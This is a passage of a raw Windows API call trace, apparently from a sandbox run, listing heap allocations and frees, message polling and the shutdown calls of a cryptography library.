hHeap=0x970000) returned 1 [0263.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.799] CryptDestroyKey (hKey=0xa870d0) returned 1 [0263.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0263.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0263.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0263.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0263.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0263.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0263.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0263.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0263.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0263.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0263.800] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0263.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0263.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0263.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0263.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0263.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.801] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0263.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0263.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0263.801] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0263.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0263.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0263.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0263.801] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0263.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.802] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0263.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0263.802] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0263.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0263.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0263.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0263.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0263.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0263.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0263.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0263.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0263.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0263.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0263.804] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0263.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0263.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.804] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0263.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0263.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0263.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0263.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0263.804] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0263.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0263.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0263.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0263.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0263.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0263.805] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0263.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0263.805] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0263.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0263.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.805] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0263.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0263.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0263.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0263.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0263.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0263.806] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0263.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0263.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0263.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0263.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0263.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0263.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0263.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0263.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0263.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0263.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0263.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.808] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0263.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0263.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0263.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.808] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.808] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0263.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0263.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0263.809] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0263.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0263.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0263.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0263.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0263.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0263.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0263.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0263.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0263.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0263.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0263.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0263.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0263.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0263.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0263.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0263.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 